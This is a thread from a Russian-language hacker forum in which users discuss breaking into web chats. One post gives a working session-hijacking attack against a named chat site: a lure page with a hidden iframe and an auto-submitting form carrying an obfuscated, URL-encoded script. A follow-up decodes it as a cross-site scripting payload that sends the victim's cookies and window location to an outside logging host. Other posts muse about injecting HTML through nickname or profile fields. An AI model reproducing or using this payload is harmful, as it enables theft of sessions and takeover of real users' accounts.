ANTICHAT — форум по информационной безопасности, OSINT и технологиям

НЕТ ЧАТОВ БЕЗ УЯЗВИМОСТЕЙ !!! Аксиома блин...Кибер пространство мобильно не сегодня-завтра появицца чел который банально легко замочит любую корпорацию...и в свою очередь какой-нить 14 летний чувак из Питера мочканет и его....
Матрица блин

ГЫ!!! Умных вещей можно сказать много! Но их нужно сделать!

народ! хотите видео со взломом www.chat.lg.ua ?

а оно большое? если 15 мег или меньше, то я хочу...

Конечно НЕ хотим!!! а хотелось бы только статью по взлому того чата!!!

2 frika честно говоря статью мне влом писать потому что слишком много вопросов остается

вот пример
http://forum.antichat.ru/cgi-bin....;t=2987

я написал человеку как срипты исполнять, а он мне типа в поле места не хватает! ну вот как мне ему объяснить...
что он полный ламер в этом деле, обижать человека ведь тоже не хочется!

что-то глючит у меня чат!

короче сессию можно украсть след. способом
заманить юзера на http://privet12.narod.ru

ибо index.html
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><iframe name="sniff" id="sniff" width="0" height="0"></iframe>

<form action="http://chat.gekkon.net/users.php" method="post" target="sniff">
<input type="hidden" name="look_for" value="">
</form>

<script type="text/javascript">

document.forms[0].elements[0].value=unescape('%3C% 73%63%72%69%70%74%3E%7A%3D%77%69%6E%64%6F%77%2E%6F %70%65%6E%28%27%27%2C%27%76%6F%63%5F%73%65%6E%64%6 5%72%27%29%3B%78%3D%6E%65%77%20%49%6D%61%67%65%28% 29%3B%78%2E%73%72%63%3D%27%68%74%74%70%3A%2F%2F%61 %6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%6 9%6E%2F%73%2E%6A%70%67%3F%27%2B%7A%2E%6C%6F%63%61% 74%69%6F%6E%2B%27%23%23%23%27%2B%64%6F%63%75%6D%65 %6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%7 0%74%3E');
document.forms[0].submit();

</script>[/QUOTE]<span id='postcolor'>

после посещения сессия и куки пользователя оказывается в логе


в unescape что-то вроде
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><script>z=window.open('','voc_sender');x =new Image();x.src='http://antichat.ru/cgi-bin/s.jpg?'+z.location+'###'+document.cookie;</script>[/QUOTE]<span id='postcolor'>

Дааа... это понятно!!! на такой способо у меня своих скриптов то валом!!! там бы как нить попытаться впилить хтмл код... или через инфу... или через ник... ну или ИЛИ...
Вот!

можт и можно!
только блин мой прокси на 8080-порту работает и чат на томже! из-за этого у меня окно с сообщениями не загружается =(